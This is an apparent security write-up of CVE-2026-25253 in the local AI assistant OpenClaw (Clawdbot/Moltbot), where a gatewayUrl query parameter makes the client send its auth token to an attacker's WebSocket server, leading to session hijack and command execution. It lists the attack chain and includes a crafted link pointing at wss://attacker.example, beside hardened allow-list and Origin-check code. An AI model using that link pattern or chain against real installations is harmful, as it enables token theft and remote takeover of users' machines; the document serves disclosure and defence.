One-click RCE on Clawd/Moltbot in under 2 hours with Hackian

Clawdbot is the former name of an open-source AI assistant (also referred to as Moltbot, and now OpenClaw) that runs locally on the user's device and can, for example, schedule appointments, send messages and automate routine tasks. It gained significant popularity in late 2025 and early 2026.

Vulnerability Found (CVE-2026-25253)

The vulnerability lies in the app's connection settings: it accepts a "gatewayUrl" value from a URL query parameter and automatically opens a WebSocket to that address, without checking that the destination is the trusted local gateway or that the request comes from a legitimate origin, and without any further authentication step before it talks to that endpoint.

Because the client then presents its stored credentials on that connection, this behaviour is the direct cause of the authentication token leaking from the user's Local Storage to an attacker's server, and it is the starting point of the full attack chain.

Attack Steps (Exploit Chain)

Based on the analysis in the referenced article and technical reports, the chain runs as follows:

1. Recon and web application analysis. The attacker, or an automated tool such as the AI pentester Hackian mentioned in the article, explores the app and finds the WebSocket handling and session-token management in the client-side JavaScript.
2. Craft a malicious webpage or URL. The page carries JavaScript (or simply a prepared link) that points the gatewayUrl parameter at a WebSocket server the attacker controls.
3. Victim clicks the link. With OpenClaw running in the background, opening the link in a browser makes the app reconnect its WebSocket to the attacker's server.
4. Steal the authentication token. The token held in Local Storage is sent over that WebSocket to the attacker's server; the client never verified where it was connecting, and the connection is not bound to a trusted origin.
5. Hijack the session. The attacker replays the token against the victim's local OpenClaw Gateway and obtains the same privileges as the legitimate user.
6. Execute commands (RCE). With that access the attacker can disable the sandbox, change the configuration, or run unsafe shell commands directly on the victim's machine.
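The following is an added example, not OpenClaw's own code, written to make the vulnerability described above and the attack chain concrete. It shows the unsafe "trust the gatewayUrl query parameter" pattern beside a hardened version that only lets the parameter select an allow-listed local host, plus the Origin check a local gateway can apply when a browser opens a WebSocket to it. The default gateway address, the allow-lists, the function names and the malicious link are all assumptions constructed for illustration.

```javascript
// Added example, not OpenClaw's own code: the unsafe "trust the gatewayUrl
// query parameter" pattern beside a hardened version, plus the Origin check a
// local gateway can apply when a browser opens a WebSocket to it.
// DEFAULT_GATEWAY, the allow-lists and all function names are assumptions.

const DEFAULT_GATEWAY = "ws://127.0.0.1:18789";                     // assumed default
const ALLOWED_GATEWAY_HOSTS = new Set(["127.0.0.1", "localhost"]);  // assumed allow-list
const TRUSTED_UI_ORIGINS = new Set([                                // assumed UI origins
  "http://127.0.0.1:18789",
  "http://localhost:18789",
]);

// UNSAFE: whatever host the link names is where the token will be sent.
// An illustrative link a page at https://attacker.example could open:
//   http://127.0.0.1:18789/?gatewayUrl=wss://attacker.example/ws
// The client connects there and presents its stored token.
function unsafePlanConnection(search, token) {
  const url = new URLSearchParams(search).get("gatewayUrl") || DEFAULT_GATEWAY;
  return { url, token, reason: "parameter trusted as-is" };
}

// HARDENED: the parameter can only select an allow-listed ws:// or wss:// host.
// Anything else (foreign host, look-alike host, non-WebSocket scheme, garbage)
// is ignored and the client falls back to its default gateway, so a crafted
// link can no longer redirect the token. The reason field makes the decision
// loggable.
function safePlanConnection(search, token) {
  const candidate = new URLSearchParams(search).get("gatewayUrl");
  if (candidate === null) {
    return { url: DEFAULT_GATEWAY, token, reason: "no parameter, default used" };
  }
  let parsed;
  try {
    parsed = new URL(candidate);
  } catch {
    return { url: DEFAULT_GATEWAY, token, reason: "unparseable parameter ignored" };
  }
  const schemeOk = parsed.protocol === "ws:" || parsed.protocol === "wss:";
  // hostname (not host) drops the port and is already lower-cased by the URL parser
  const hostOk = ALLOWED_GATEWAY_HOSTS.has(parsed.hostname);
  if (!schemeOk || !hostOk) {
    return { url: DEFAULT_GATEWAY, token, reason: `rejected ${candidate}` };
  }
  return { url: parsed.href, token, reason: "allow-listed parameter accepted" };
}

// Gateway side: browsers always set Origin on a WebSocket upgrade and a page
// cannot forge it, so refusing unknown origins keeps a foreign page from
// opening a socket to the local gateway at all. Requests with no Origin
// header (CLI tools, scripts) pass this check and still have to present a
// valid token.
function acceptUpgrade(headers) {
  const origin = headers.origin;
  if (origin === undefined) return true;
  return TRUSTED_UI_ORIGINS.has(origin);
}

// Demonstration on a constructed malicious link (not captured traffic).
const maliciousSearch = "?gatewayUrl=wss://attacker.example/ws";
console.log("unsafe :", unsafePlanConnection(maliciousSearch, "secret-token").url);
console.log("safe   :", safePlanConnection(maliciousSearch, "secret-token"));
console.log("origin :", acceptUpgrade({ origin: "https://attacker.example" }));
```

The client-side allow-list and the gateway-side Origin check are independent defences: the first stops the token from ever leaving for a foreign host, the second stops a foreign page from reaching the gateway even if it obtains a token. Run it with any current Node.js; it uses only the built-in URL and URLSearchParams classes.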

Why It's Highly Dangerous

No authentication is needed to start the attack: the victim only has to visit the prepared webpage while OpenClaw is running. From there the attacker holds a valid token for the local gateway and can run arbitrary commands on the victim's machine with the user's privileges.

Prevention and Current Status

This vulnerability has been patched in OpenClaw version 2026.1.29 (or later); users should update immediately. Anyone who clicked an untrusted link while running an older version should treat the gateway token as compromised: reset it and rotate any passwords or API keys the assistant had access to.

Reference https://ethiack.com/news/blog/one-click-rce-moltbot
